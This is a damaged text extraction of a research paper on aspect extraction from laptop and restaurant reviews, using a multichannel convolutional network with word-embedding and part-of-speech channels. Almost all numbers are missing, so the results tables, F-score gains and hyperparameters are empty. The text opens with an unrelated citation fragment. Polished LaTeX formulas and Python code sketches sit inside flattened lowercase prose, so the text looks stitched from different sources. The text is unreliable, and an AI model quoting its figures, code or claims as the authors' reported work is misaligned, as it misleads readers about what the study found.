kang liu, yubo chen, and jun zhao. . distant supervision for relation extraction via piecewise convolutional neural networks. in emnlp. aspect extraction on user textual reviews using multi-channel convolutional neural network aspect extraction on user textual reviews using multi-channel convolutional neural network aminu da’u , and naomie salim school of computing, faculty of engineering, universiti teknologi malaysia, skudai, johor, malaysia department of otm, hassan usman katsina polytechnic, katsina, nigeria abstract aspect extraction is a subtask of sentiment analysis that deals with identifying opinion targets in an opinionated text. existing approaches to aspect extraction typically rely on using handcrafted features, linear and integrated network architectures. although these methods can achieve good performances, they are time-consuming and often very complicated. in real-life systems, a simple model with competitive results is generally more effective and preferable over complicated models. 
in this paper, we present a multichannel convolutional neural network for aspect extraction. the model consists of a deep convolutional neural network with two input channels: a word embedding channel which aims to encode semantic information of the words and a part of speech (pos) tag embedding channel to facilitate the sequential tagging process. to get the vector representation of words, we initialized the word embedding channel and the pos channel using pretrained word vec and one-hot-vector of pos tags, respectively. both the word embedding and the pos embedding vectors were fed into the convolutional layer and concatenated to a one-dimensional vector, which is finally pooled and processed using a softmax function for sequence labeling. we finally conducted a series of experiments using four different datasets. the results indicated better performance compared to the baseline models. subjects artificial intelligence, data mining and machine learning, data science keywords aspect extraction, multichannel cnn, aspect extraction, convolutional neural network, deep learning introduction with the growth of textual information on the web, aspect-based sentiment analysis has been widely studied, thereby attracting much attention in the research community. one of the important subtasks of aspect-based sentiment analysis is aspect extraction, which is simply the act of extracting attributes of an entity about which opinions are expressed (liu, ). aspect extraction can generally be performed using either unsupervised (qiu et al., ; wang & wang, ) or supervised methods (lafferty, mccallum & pereira, ; poria, cambria & gelbukh, ; cambria, ). for many years, the state-of-the-art methods of aspect extraction basically depend on the conditional random fields (crf) (lafferty, mccallum & pereira, ), recurrent neural network (rnn) (irsoy & cardie, ), linguistic patterns and syntactic rules (qiu et al., ; how to cite this article da’u a, salim n. . aspect extraction on user textual reviews using multi-channel convolutional neural network. peerj comput. sci. :e doi . /peerj-cs. submitted december accepted april published may corresponding author aminu da’u, dauaminu@graduate.utm.my academic editor diego amancio additional information and declarations can be found on page doi . /peerj-cs. copyright da’u and salim distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:dauaminu@�graduate.�utm.�my https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ popescu & etzioni, ). both of these approaches have their own shortcomings. for example, crf is typically linear in nature. thus, it requires a large number of datasets to effectively work. rnns are generally not effective in predicting word labels or phrases that are determined by the context due to their feedback nature. syntactic rules and linguistic patterns need to be handcrafted and their accuracy generally depends on the grammatical accuracy of the sentences. to address the aforementioned issues among others, few approaches have been proposed to exploit deep convolutional neural network (cnn) architectures to improve the performance of the aspect extraction models (poria, cambria & gelbukh, ; xu et al., a). 
these models do not usually require predefined features to be manually handpicked; instead, they can automatically learn sophisticated features from their datasets. generally, words are usually represented in the form of a vector and the extraction of the feature is left to the network. consequently, words with similar semantics can be mapped using these models to nearby locations in their coordinate systems. even though these approaches have shown better performances than their prior approaches, however, there are some important issues worth to be considered for further improvement: first, most of the existing approaches typically used only general pretrained word embeddings such as google word vec or glove embeddings as the main semantic feature for the aspect extraction, although word embeddings have shown effectiveness in capturing both syntactic and semantic information of words. however, in some cases, due to the distributional hypothesis, word embeddings alone fail to efficiently capture the syntactic information of some aspect terms, for example, in the latent space, bad and good are typically mapped together as neighbors while analyzing these words is very critical in aspect classification. moreover, due to the complexity of the aspect extraction task, fine-grained embeddings are particularly important to achieve a better performance (yin et al., ). therefore, we urge that using a domain-specific embedding is very crucial for information extraction performance. thus, in this paper, we exploited both the general and domain-specific embeddings to examine which embeddings are superior over the other. additionally, most of the previous cnn based aspect extraction models are either stacked (ye, yan & luo, ) or integrated with other models such as long short term memory (lstm) (dong, zhang & yang, ). these consequently increase the complexity of the model parameters. although these may improve the model performance, according to blumer et al. ( ), in real-world applications, a simple model is always preferred and more useful over the complicated model. this is particularly important when a model is used for a real-life situation such as chatbot in which a complex model will retard the inferential performance of the model. thus, achieving a competitive performance while ensuring a simple architecture without manually crafting features and much complexity is always a crucial direction to explore. this paper proposes to achieve such a goal. motivated by the above-mentioned issues, this paper proposes an aspect extraction model based on an multichannel convolutional neural network (mcnn) leveraging two different embedding layers: word embedding and part of speech (pos) tag embedding layer. to achieve a simple architecture while ensuring a competitive performance, da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we propose a purely cnn model for sequential labeling. a cnn model which is nonlinear network architecture can fit data more easily with relatively few parameters. the major contributions of the proposed model can be summarized as follows: . we introduced an mcnn model for aspect extraction leveraging two different input channels: word embeddings and pos tag embeddings channel to encode the contextual information and enhance sequential tagging of words, respectively. . we investigated the importance of using domain-specific embeddings over the general-purpose word embeddings in aspect extraction. . 
we conducted a series of experiments on the semeval challenge datasets (pontiki & pavlopoulos, ; maria et al., ; hercig et al., ) and showed that our approach outperformed the baseline methods with significant gains across all the datasets. the remainder of the paper is arranged as follows. in sections, “related work”, “the proposed model”, “experimental study”, “results and discussion” and “conclusion and future direction”. related work aspect extraction as the subtask of aspect-based sentiment analysis has been widely studied by many researchers. one of the earliest studies was conducted by hu & liu ( ) to propose a rule-based method for the explicit aspect categorization. this method was later improved by many approaches among which include the work of popescu & etzioni ( ) who used point-wise mutual information between the product class and noun phrase for product feature extraction. generally, aspect extraction can be performed using either unsupervised (qiu et al., ; wang & wang, ; popescu & etzioni, ; chen, mukherjee & liu, ) or supervised method (lafferty, mccallum & pereira, ; poria, cambria & gelbukh, ; cambria, ). our proposed work particularly focuses on the supervised methods which treat aspect extraction task as a sequence labeling problem. the traditional supervised methods are mainly based on hidden marcok model (jin & ho, ) and crf (lafferty, mccallum & pereira, ). with the recent success of deep learning in different areas such as image classification and pattern recognition, several approaches have been proposed to exploit deep learning methods for the aspect extraction. for instance, wang et al. ( ) employed a restricted boltzmann machine model to jointly address the problem of sentiment–aspect extraction. irsoy & cardie ( ) utilized rnn and demonstrated its superior performance over the crf-based models for aspect extraction. this method was later improved by pengfei, shafiq & helen ( ). they applied more sophisticated variants of the rnn using fine-tuned word vectors and additional linguistic features for better improvement. to tag each word with non-aspect or aspect label, a multilayer cnn was proposed by poria, cambria & gelbukh ( ). the authors used syntactic and linguistic patterns to improve the accuracy of the model. da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for further improvement, the attention-based model has been used for aspect extraction to learn the representation of the informative words in text review (chen et al., ; wang, pan & dahlmeier, ; maria et al., ; hercig et al., ). tree-based methods have been shown effective for improving the performance of the aspect extraction model. for instance, yin et al. ( ) introduced a dependency path approach in which both the dependency and linear contextual information are considered for the word representation. a similar method was proposed by wang et al. ( ) to exploit dependency tree and crf for better coextraction of aspect and opinion terms. xu et al. ( ) and li & lam ( ) also exploited deep learning for coextraction of the aspect and opinion terms. recently, a tree-based cnn was introduced by ye, yan & luo ( ). they applied tree-based convolution over a sentence dependency parse tree. luo et al. ( ) proposed an end-to-end method to integrate bilstm, crf and word embeddings for aspect term extraction. our approach is closely related to the work of xu et al. 
( b) in which a double embeddings method has been used to model aspect extraction using two different in-domain word embeddings. however, this method has a drawback in that it solely relies on the word embedding as the main feature and ignores the pos tag for the sequential tagging. in our approach, pos tag features are utilized in addition to the word embedding features to improve the model performance. furthermore, unlike the previous methods, we specifically used two different channels as the input to the convolutional network architecture. we used both general and domain-specific embedding in the first channel specifically to capture the syntactic and semantic information of the word, and pos tag embedding in the second channel to specifically improve the sequential labeling of the aspects. to the best of our knowledge, this is the first work to use a mcnn architecture leveraging both word embeddings and pos tag embeddings in different channels for better performance of the aspect extraction model.

our model

figure illustrates the proposed mcnn architecture. the model is based on the cnn structure proposed in kim ( ). specifically, the proposed model is made up of two input layers: word embedding and pos embedding layer. it consists of two convolutional layers followed by a max pooling layer, rectified linear unit, a fully connected layer, and a softmax classifier to predict the multiclass labels of the aspects with labelling space y = {b, i, o}, with "i", "o" and "b" representing inside, outside or beginning of the aspect term, respectively. detail of the model is described in the following subsections.

input channels

the model typically comprises two sets of vectors, each of which is an input channel to the network (kim, ). for the word embedding channel, the main idea is to capture the semantic information of the words. for that, we use both general and domain-specific embeddings. for the general embedding, we used a pretrained word embedding trained on billion words of the google corpus (mikolov, yih & zweig, ), while for the domain-specific embedding, we specifically used a cbow (continuous bag of words) architecture trained on amazon and yelp reviews for the laptop and restaurant domain, respectively. in this case, each word was encoded as a -dimensional vector. we use word padding to make sure that all sentences are of the same length. to capture the contextual features of the words, the ith word is mapped to a k-dimensional embedding, so the semantic features of a sentence of length n are given as {x_1, . . . , x_n}, x_i ∈ R^k. for the pos tag embeddings, the main idea is to improve the aspect extraction process based on the pos tagging. specifically, we employ one-hot vectors in which each tag is transformed into a k-dimensional vector. similar to jebbara & cimiano ( ), we use a stanford pos tagger with tags. these are encoded as -dimensional vectors and represented as a matrix {s_1, . . . , s_n}.

convolutional layer

after all the textual information is encoded into vectors and zero padding is applied to make all the embedding channels of the same length, the convolution operations are applied to generate local features. thus, the main purpose of the convolutional layer is to extract local features from the embedding layer.
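before the convolution itself, the two input channels described above can be assembled roughly as follows; this is a hedged sketch (the padding length, embedding dimension, tag inventory and lookup table are placeholder assumptions, not the exact resources used in the paper):

```python
import numpy as np

MAX_LEN, EMB_DIM = 80, 300                                   # assumed padding length and vector size
POS_TAGS = ['NN', 'NNS', 'NNP', 'JJ', 'VB', 'VBD', 'IN', 'DT', 'OTHER']  # illustrative tag subset

def word_channel(tokens, word_vectors):
    """n x EMB_DIM matrix of (general or domain-specific) word vectors, zero-padded."""
    mat = np.zeros((MAX_LEN, EMB_DIM))
    for i, tok in enumerate(tokens[:MAX_LEN]):
        if tok in word_vectors:                              # pretrained word2vec-style lookup
            mat[i] = word_vectors[tok]
    return mat

def pos_channel(tags):
    """n x |POS_TAGS| matrix of one-hot pos vectors, zero-padded."""
    mat = np.zeros((MAX_LEN, len(POS_TAGS)))
    for i, tag in enumerate(tags[:MAX_LEN]):
        j = POS_TAGS.index(tag) if tag in POS_TAGS else POS_TAGS.index('OTHER')
        mat[i, j] = 1.0
    return mat

# toy usage with a random lookup table standing in for trained embeddings
vecs = {'battery': np.ones(EMB_DIM), 'life': np.ones(EMB_DIM) * 0.5}
Z = word_channel(['battery', 'life', 'is', 'poor'], vecs)    # semantic channel (matrix z)
P = pos_channel(['NN', 'NN', 'VB', 'JJ'])                    # pos channel (matrix p)
print(Z.shape, P.shape)
```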
here, we use two different filter sizes for the pos feature p and the semantic feature z. typically, convolution is a dot product involving a filter with weights $w \in \mathbb{R}^{hk}$ and a vector of an h-gram in a sentence (kim, ).

(figure : overview of the mcnn architecture, showing the word embedding channel and the pos tag channel feeding convolutional layers with feature maps, a pooling layer, and an output layer for aspect categorization.)

let $w^p \in \mathbb{R}^{hk}$ and $w^z \in \mathbb{R}^{hk}$ be the filters applied to h-grams of the matrix p and the matrix z, respectively. the features generated are given as

$c_i = f(w \cdot x_{i:i+h-1} + b)$ ( )

where f is a nonlinear function (such as the hyperbolic tangent or relu) and b is a bias term. this is applied to each window $[x_{1:h}, x_{2:h+1}, \ldots, x_{n-h+1:n}]$, yielding feature maps in $\mathbb{R}^{n-h+1}$ for the matrix p and the matrix z, respectively. the feature map generated for p is given by

$c^p = [c^p_1, c^p_2, \ldots, c^p_{n-h+1}]$ ( )

and, similarly, the feature map for the matrix z is given as

$c^z = [c^z_1, c^z_2, \ldots, c^z_{n-h+1}]$ ( )

it is worth mentioning that different semantic and pos features can be extracted using several filters.

max pooling layer
the pooling operation is aimed at reducing the feature resolution maps by applying a pooling function to several units in a local region whose size depends on a parameter known as the pooling size. the pooling operation generally serves as a generalization over the features captured by the convolutional operation. thus, the basic idea behind utilizing a max pooling layer is to extract the most salient features from the convolutional layer. typically, the pooling layer takes the maximum element in each generated feature map. this can be given as $\hat{c}^p = \max[c^p_1, c^p_2, \ldots, c^p_{n-h+1}]$ and $\hat{c}^z = \max[c^z_1, c^z_2, \ldots, c^z_{n-h+1}]$ for p and z, respectively. after max pooling is applied, the final feature is generated by concatenating the semantic and pos features for each filter, $c = \hat{c}^p \oplus \hat{c}^z$, where $\oplus$ is the concatenation operator. as we use several filters for the pos and semantic features, the final feature vector is

$c = \hat{c}^p_1 \oplus \ldots \oplus \hat{c}^p_n \oplus \hat{c}^z_1 \oplus \ldots \oplus \hat{c}^z_m$ ( )

where n and m are the numbers of filters for the semantic and pos features, respectively.

output layer
finally, we apply the softmax classifier to generate the probability distribution over the given aspect labels. the main idea of the softmax function is to carry out classification over the high-level features generated by the convolution and pooling layers; in this case, it yields the probability distribution over all the output labels. we treat aspect extraction as a sequence labeling process and apply the iob scheme to encode our aspect annotations as a tag sequence. each word in the text is assigned one of the three tags, i, o or b, indicating inside, outside or beginning of an aspect term, respectively.
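the two-channel convolution, pooling and tagging steps described above can be tied together in a short sketch. the pytorch module below is illustrative only: the dimensions, the filter sizes (2, 3, 5), the 45-tag pos set and the per-position handling of the convolution outputs are assumptions standing in for the paper's elided configuration, and it does not reproduce the exact pooling arrangement of the original model.

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class MCNNSketch(nn.Module):
    """rough two-channel cnn tagger over word and pos channels."""
    def __init__(self, word_dim=600, pos_dim=45, n_filters=100,
                 filter_sizes=(2, 3, 5), n_tags=3):
        super().__init__()
        # separate 1-d convolutions for the word channel and the pos channel
        self.word_convs = nn.ModuleList(
            [nn.Conv1d(word_dim, n_filters, k, padding=k // 2) for k in filter_sizes])
        self.pos_convs = nn.ModuleList(
            [nn.Conv1d(pos_dim, n_filters, k, padding=k // 2) for k in filter_sizes])
        self.out = nn.Linear(2 * n_filters * len(filter_sizes), n_tags)

    def forward(self, words, pos):
        # words: (batch, seq_len, word_dim); pos: (batch, seq_len, pos_dim)
        w = words.transpose(1, 2)   # conv1d expects (batch, dim, seq_len)
        p = pos.transpose(1, 2)
        feats = [F.relu(conv(w)) for conv in self.word_convs] + \
                [F.relu(conv(p)) for conv in self.pos_convs]
        # keep per-position features so every word receives a b/i/o prediction
        h = torch.cat([f[:, :, :words.size(1)] for f in feats], dim=1)
        h = h.transpose(1, 2)       # (batch, seq_len, concatenated feature dim)
        return F.log_softmax(self.out(h), dim=-1)

# usage with random tensors standing in for one padded batch
model = MCNNSketch()
scores = model(torch.randn(4, 83, 600), torch.randn(4, 83, 45))  # (4, 83, 3)
```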
model variations
in order to evaluate our model, we conducted a series of experiments with different settings of the model:

- mcnn-random: to assess the impact of word embeddings, the word embedding channel is randomly initialized while the input channel containing the pos tag embeddings is ignored, meaning that only the randomized word embedding channel is considered for training.
- mcnn+w v: here, the word embedding layer is initialized with pretrained word2vec vectors and optimized during training. in particular, we used general-purpose word embeddings trained on the google corpus (mikolov, yih & zweig, ).
- mcnn+w v : this is similar to the mcnn+w v setting; however, instead of using the general pretrained word embedding, we used a domain-specific word2vec model trained on either the amazon or the yelp review datasets. this is aimed at assessing the impact of domain-specific word embeddings compared to the general word embeddings.
- mcnn+w v+pos: in this case, both input channels are considered for training and optimization. specifically, we used the general word embeddings in one channel and the pos tag embeddings in the other channel. the model parameters were fine-tuned during optimization.
- mcnn+w v +pos: this is similar to the mcnn+w v+pos variant; however, instead of applying the general pretrained word2vec, a domain-specific word embedding was used. all the parameters were fine-tuned.

experimental study
in this section, we first present a description of the datasets used, then provide a detailed experimental procedure for evaluating the performance of the proposed approach, and finally make a comparison against the baseline methods. we use recall, precision and f score as the evaluation metrics; these metrics have been previously used in several relevant works (poria, cambria & gelbukh, ; popescu & etzioni, ).

dataset
to evaluate the performance of the model, we utilized four different benchmark datasets. the datasets, which comprise training and test snippets, were collected manually and made available by the organizers of the semeval competitions. the first two datasets are from semeval (pontiki & pavlopoulos, ), comprising reviews from the laptop and restaurant domains, respectively, while the third and fourth datasets are from semeval (maria et al., ) and semeval (hercig et al., ), respectively, containing reviews from the restaurant domain. these datasets comprise review sentences with aspect terms labelled as spans of characters. tables and show the statistics of the datasets and typical examples of the aspect term distribution for the laptop and restaurant domains, respectively. in order to initialize the word vectors, we exploit two different word embeddings: ( ) general embeddings, for which we use pretrained google word2vec trained on billion words of the google news corpus (mikolov, yih & zweig, ) using the cbow architecture; and ( ) domain-specific embeddings trained on the restaurant reviews from the yelp dataset and the electronics reviews from the amazon dataset, for the restaurant and laptop domains, respectively. the yelp (https://www.yelp.com/dataset/) and amazon (mcauley & leskovec, ) review datasets contain . million and . million reviews, respectively. we use gensim, which has an implementation of cbow, to train embeddings on all the datasets. words that appear less than five times in the reviews are replaced with an <other> token.
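training the domain-specific cbow embeddings with gensim as just described can be sketched in a few lines. the snippet below is an assumption-laden illustration: the toy corpus, the output path and the 300-dimensional setting are hypothetical, parameter names follow gensim 4.x (older versions use `size` instead of `vector_size`), and the min-count threshold is lowered here only so the toy corpus trains (the paper's rule drops words seen fewer than five times).

```python
from gensim.models import Word2Vec

# hypothetical toy corpus standing in for millions of tokenized yelp/amazon reviews
domain_sentences = [
    ["the", "pad", "thai", "was", "excellent"],
    ["battery", "life", "on", "this", "laptop", "is", "poor"],
]

# sg=0 selects the cbow architecture
model = Word2Vec(
    sentences=domain_sentences,
    vector_size=300,   # assumed dimensionality
    window=5,
    min_count=1,       # the paper uses a threshold of five on the full corpora
    sg=0,
    workers=4,
)

model.save("domain_cbow.model")            # hypothetical output path
vector = model.wv["laptop"]                # lookup used to initialize the word channel
```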
table : semeval challenge datasets showing the number of sentences and aspect terms for the train and test splits of semeval -l, semeval -r, semeval -r and semeval -r. note: l and r represent the laptop and restaurant domains, respectively.

table : examples of aspect and aspect term word distributions in the laptop and restaurant domains.
domain | aspect | aspect terms
laptop | price | price, regret, deal, money, store, stars, gift, penny, worth
laptop | warranty | warranty, center, policy, support, repair, service, extended, longer, contact
laptop | design | exterior, wheels, plastic, wheel, design, interior, wheels, clean, good
restaurant | service | manager, owner, staff, workers, employees, messenger, chefs, cleaner
restaurant | food | crispy, tender, chicken, beef, shrimp, curry, tuna, egg, onions
restaurant | ambience | setting, décor, lighting, wall, elegant, cool, nice, trendy

preprocessing
we carry out preprocessing with the aim of obtaining clean and structured textual reviews. specifically, we convert all the reviews into lower case, keep only english text, and split the text into separate sentences. we apply a noise removal strategy which includes the removal of words with special characters, stop words, alphanumeric characters and words with a length less than or equal to .

experimental setup
we use a fivefold cross-validation strategy to choose the hyperparameters. specifically, we choose three filter sizes of ( , , ), with feature maps, and use a max pooling layer after each convolutional layer. as we wanted to tag each word, we use a stride of for each convolutional layer. to tackle the issue of parameter overfitting, we utilized dropout regularization on the penultimate layer with an l2 constraint of . the training is conducted using stochastic gradient descent over shuffled mini-batches of size and a dropout rate of . . we apply relu for all the datasets and fix the size of the hidden layer accordingly; these values were chosen based on a careful grid search on the validation subset. to better assess the performance of the proposed model, we first identify the best performing settings of the model and then make a further comparison with the following baseline models:

- dlirec (toh & wang, ): the winning system in the semeval competition (subtask ), which employs a variety of lexical and semantic features derived from nlp resources to improve the performance of the model.
- ihs r&d (chernyshevich, ): another top system in the semeval competition, which exploits crf and additional lexical and statistical features to improve performance.
- nlangp (toh & su, ): the top system in the semeval challenge for the restaurant domain.
- wdemb (yin et al., ): a dependency-based approach integrating crf with path embeddings for aspect term extraction.
- rncrf (wang et al., ): this model jointly uses crf and a dependency-based recursive neural network for coextracting aspect and opinion terms. the method also exploits additional handcrafted features.
- cmla (wang, pan & dahlmeier, ): a multilayer coupled-attention model for opinion and aspect term coextraction.
- min (li & lam, ): a multitask learning approach that exploits lexicons and dependency rules to jointly perform coextraction of aspect and opinion terms. it uses two different lstms for the polarity classification of sentences.
� dtbcsnn (ye, yan & luo, ): a dependency tree based convolutional stacked neural network which used the inference layer for aspect extraction. � de-cnn (xu et al., b): a cnn based model exploiting double embeddings for aspect extraction. � bidtreecrf (luo et al., ): a tree-based deep learning approach which uses bidirectional lstm and the crf layer for improving aspect extraction. results and discussion table shows the results of the proposed model compared to the baseline models. here, the results of the best two settings of the model were recorded for each dataset. it can be shown that the best performing variants of the proposed model significantly outperform the state of art approaches. the statistical t-test shows the improvement is significant at the confidence level of %. da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ compared to the best-performing systems in the semeval competitions, our model performs better than his_rd and dlirec with gains of . %, . % and . %, . % f score on the semeval -l and semeval -r datasets, respectively. similarly, our approach also achieves significant gains against nlangp by . % and . % f score on the semeval -r and semeval -r, respectively. it can be observed that even the wdemb approach which exploits word dependency with additional embedding, still our model achieved significant gains compared to the model across all the datasets. one can also notice from table that, our model outperforms min which is a multitasking approach, with a gain of . %, . %, . % and . % f score on the semeval -l, semeval -r, semeval -r and semeval -r datasets, respectively. our model also outperforms cmla which is a multilayer approach by . % f score on the semeval -l datasets. despite exploiting the additional handcrafted features by rncr+f and dtbcsnn, still, our approach achieves . %, . % and . %, . % f score gains over the two approaches on the semeval -l and semeval- -r datasets, respectively. moreover, our model outperforms the recent tree-base bidirectional method, bidtreecrf by . %, . %, . % and . % f score on the semeval -l, semeval -r, semeval -r and semeval -r datasets, respectively. compared to the double embedding cnn approach, de-cnn which is the state-of-the-art double embedding approach, our model suffered a low performance on the semeval -l, however, it manages to achieve a gain of . % f score on the semeval -r datasets. this apparently shows the superior performance of our model over the de-cnn model. it can be observed from table , that different settings of the model have different performances across the four different datasets. mcnn-wv -pos performs better than all the other variants across all the datasets while the mcnn-random records relatively lowest performance except on the semeval -r where the mcnn-wv -pos records table comparison results of our best performing model variants in terms of f scores (%) with the state-of-the-art methods. model semeval -l semeval -r semeval -r semeval -r his_rd . . – – nlangp – – . . dlirec . . – – wdemb . . . – rncrf+f . . – – cmla . – – – min . . . . bidtreecrf . . . . dtbcsnn . . de-cnn . – – . mcnn+wv+pos . . . . mcnn+wv +pos . . . . note: values in bold represent best results. da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the best results. this is likely due to the relatively smaller size of the semeval -r datasets. 
similarly, one can notice from the table , that in all the variants, the best results were recorded on the restaurant domain while relatively lower results are recorded on the laptop domain in all the datasets. this is likely due to the lower number of the aspects term contained in the restaurant domain than in the laptop review domain. as can be seen from table and fig. , all the variants of our model with the exception of mcnn-random demonstrate relatively competitive results with significant improvement across all the domains. this specifically indicates the weakness of the randomly initialized word embeddings for the aspect extraction. this is because mcnn-random is randomly initialized while the other variants are particularly initialized with pretrained word embeddings. this translates the importance of pretrained word embeddings over the randomly initialized word embeddings. the results also show that using domain-specific word embeddings for both laptop and restaurant domains perform better than the general word embeddings (google embeddings) initialization. this table comparison results of the different variants of our model in terms of recall, precision and f score (%) performance. variant semeval -l semeval -r semeval -r semeval -r r p f r p f r p f r p f mcnn+rand . . . . . . . . . . . . mcnn+wv . . . . . . . . . . . . mcnn+wv . . . . . . . . . . . . mcnn+wv+pos . . . . . . . . . . . . mcnn+wv +pos . . . . . . . . . . . . note: values in bold represent best results. . . . . . . . . . . . mcnn-ran mcnn-wv mcnn-wv mcnn-wv-pos mcnn-wv -pos sc o re ( % ) semeval -l semeval -r semeval -r semeval -r figure performance of our model variants in terms of f score accuracy. each point indicates an f score performance computed in percentage (%). full-size doi: . /peerj-cs. /fig- da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ supports the intuition that domain-specific embeddings typically contain opinion specific information related to a particular domain (laptop or restaurant) which helps to perform better than the general word embeddings which are merely trained on the google news corpus which is typically composed of textual reviews about the commonly discussed matters on the news. one can observe from fig. that in both laptop and restaurant domain the model suffers from low recall, meaning that it missed some vital aspect terms. however, using the pos tag which is an important linguistic feature help to overcome some drawbacks thereby improving the performance of the model. this specifically indicates the importance of using pos tags features in addition to pretrained word embeddings in aspect term extraction. we further conduct an experiment to assess the sensitivity of the model towards word embeddings dimensions. we specifically use different word embedding dimensions from to with the intervals of , i.e., { , , , , , , , , , , , , , }. the laptop domain uses embeddings trained on the amazon reviews and restaurant domain use the embeddings trained on the yelp reviews datasets. figure shows the experimental results on the mcnn-wv variant. the results indicate the highest performance at around dimensions and relatively remains stable above . this particularly implies the insensitivity of the model toward the dimension of word embeddings provided it is within the appropriate range such as – . 
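the sweep over embedding dimensions described above can be scripted directly. the sketch below is illustrative only: the grid of dimensions is an assumption standing in for the elided values in the paper, and `train_and_evaluate` is a hypothetical stub (returning a placeholder score so the sketch runs) standing in for retraining the domain embeddings and the mcnn variant at each size.

```python
import random

def train_and_evaluate(embedding_dim: int) -> float:
    """hypothetical helper: train cbow vectors at this dimension, plug them
    into the mcnn variant, and return a validation f1 score."""
    return random.random()  # placeholder so the sketch runs end to end

# assumed grid; the paper sweeps a range of dimensions at fixed intervals
results = {dim: train_and_evaluate(dim) for dim in range(25, 351, 25)}

best_dim = max(results, key=results.get)
print(f"best embedding dimension on validation: {best_dim}")
```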
it is clear that two key factors are basically the reasons behind the good performance of our model compared to the baseline methods: first, the pos tag embedding input layer which helps for better sequence labeling. the domain-specific pretrained word embeddings which were trained on the target domain corpus of the review datasets. the advantage of our approach is that it is relatively uncomplicated and automatic that . . . . . . . . . . . r p r p r p r p semeval -l semeval -r semeval -r semeval -r ) %( er ocs mcnn-ran mcnn-wv mcnn-wv mcnn-wv-pos mcnn-wv -pos figure performance of the different model variants in terms of recall and precision. each point shows precision and recall performance measured in percentage (%). full-size doi: . /peerj-cs. /fig- da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ does not require any feature engineering. this saves time, cost and improves the high performance of the model. conclusion in this research, we proposed an aspect extraction approach using deep mcnn leveraging two different channels namely, word embeddings and pos tag embeddings. we presented a series of experiments and the results on various datasets showed that our proposed approach outperformed the state-of-the-art methods. our results support the previous findings that showed that pretrained word vectors are always better than randomly initialized embeddings in deep learning based nlp tasks such as aspect extraction. it also reaffirms many of the previous findings which show that exploiting pos tag features improves the performance of nlp methods including aspect extraction. we also demonstrated the importance of using a domain specific word embedding over the general word embeddings. as a future direction of research, we think that applying an attention-based deep learning model for improving aspect extraction is worth exploring, and that integrating a lexicon in the word embedding layer in the mcnn is another direction of further exploration. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. sc o re ( % ) semeval -l semeval -r semeval -r semeval -r figure f score of the mcnn-wv -pos variant of our model on different word embedding dimensions. each point shows the f performance measured in percentage (%). full-size doi: . /peerj-cs. /fig- da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ author contributions � aminu da’u conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper. � naomie salim conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft, proof reading. data availability the following information was supplied regarding data availability: the relevant datasets and the snippets codes are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. 
references blumer a, ehrenfeucht a, haussler d, warmuth mk. . occam's razor. information processing letters ( ): – doi . / - ( ) - . cambria e. . affective computing and sentiment analysis. ieee intelligent systems ( ): – doi . /mis. . . chen z, mukherjee a, liu b. . aspect extraction with automated prior knowledge learning. in: nd annual meeting of the association for computational linguistics, acl – proceedings of the conference. vol. . copenhagen, – . chen p, sun z, bing l, yang w. . recurrent attention network on memory for aspect sentiment analysis. in: proceedings of the conference on empirical methods in natural language processing. baltimore, – . chernyshevich m. . ihs r&d belarus: cross-domain extraction of product features using conditional random fields. in: proceedings of the th international workshop on semantic evaluation (semeval ). dublin, – . dong f, zhang y, yang j. . attention-based recurrent convolutional neural network for automatic essay scoring. in: proceedings of the st conference on computational natural language learning (conll ). vancouver, – . hercig t, brychcín t, svoboda l, konkol m. . uwb at semeval- task : aspect based sentiment analysis. in: proceedings of semeval- . san diego, – . hu m, liu b. . mining and summarizing customer reviews. in: proceedings of the acm sigkdd international conference on knowledge discovery and data mining–kdd ' . new york: acm, – . irsoy o, cardie c. . opinion mining with deep recurrent neural networks. in: proceedings of the conference on empirical methods in natural language processing (emnlp). doha, – . jebbara s, cimiano p. . aspect-based relational sentiment analysis using a stacked neural network architecture. in: artificial intelligence, august. – doi . / - - - - - . jin w, ho hh. . a novel lexicalized hmm-based learning framework for web opinion mining. in: proceedings of the th annual international conference on machine learning– icml ' . new york: acm, – . da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /mis. . http://dx.doi.org/ . / - - - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kim y. . convolutional neural networks for sentence classification. in: proceedings of the emperical methods in natural language processing (emnlp). doha, new york: acm, – . lafferty j, mccallum a, pereira fcn. . conditional random fields: probabilistic models for segmenting and labeling sequence data. in: proceedings of the th international conference on machine learning (icml ). vol. . new york: acm, – . li x, lam w. . deep multi-task learning for aspect term extraction with memory interaction. in: proceedings of the conference on empirical methods in natural language processing. copenhagen, – . liu b. . sentiment analysis and opinion mining. first edition. san rafael: morgan & claypool publishers. luo h, li t, liu b, wang b, unger h. . improving aspect term extraction with 